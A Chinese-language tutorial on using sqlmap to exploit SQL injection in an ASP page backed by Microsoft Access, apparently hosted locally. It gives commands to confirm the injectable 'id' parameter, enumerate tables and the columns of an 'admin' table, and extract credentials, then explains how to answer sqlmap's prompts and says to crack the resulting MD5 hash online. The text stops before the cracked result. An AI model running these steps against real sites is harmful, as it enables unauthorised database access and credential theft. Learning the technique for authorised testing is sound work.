(1) 猜解是否能注入
- sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513"

it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
它后端DBMS看起來像是“Microsoft Access”。 是否要跳過特定於其他DBMS的測試有效內容
輸入"Y"。

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)?
GET參數'id'是脆弱的。 你想要繼續測試其他人(如果有的話)
輸入"Y"。

猜出來的數據庫是"Microsoft Access"數據庫。
(2) 猜解表
- sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --tables

do you want to use common table existence check? [Y/n/q]
是否要使用公共表存在檢查存在? 輸入"Y"

please enter number of threads? [Enter for 1 (current)] 請輸入線程數? [輸入 1 (當前)]
然后要你輸入線程數,這里輸入10,線程數不能輸入過大,否則會提示錯誤。

猜解成功后得出的表。
(3) 根據猜解的表進行猜解表的字段(假如通過2得到了admin這個表)
- sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin

do you want to use common column existence check? [Y/n/q] 你想使用公共列存在檢查嗎?[Y/n/q]
輸入"Y"。然后輸入線程數

一番等待結果就出來了。

(4) 根據字段猜解內容(假如通過3得到字段為admin和password)

他會詢問你: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
你想存儲的哈希值來與其他工具最終進一步處理臨時文件?
輸入"Y";
然后他又會詢問你: do you want to crack them via a dictionary-based attack? [Y/n/q]
你想通過基於字典的攻擊來破解他們嗎?

輸入"N"; 使用它自帶的

用戶名與密碼就出來了。密碼是MD5加密的: a48e190fafc257d3 放到網上去解密,解密之后得到的結果為

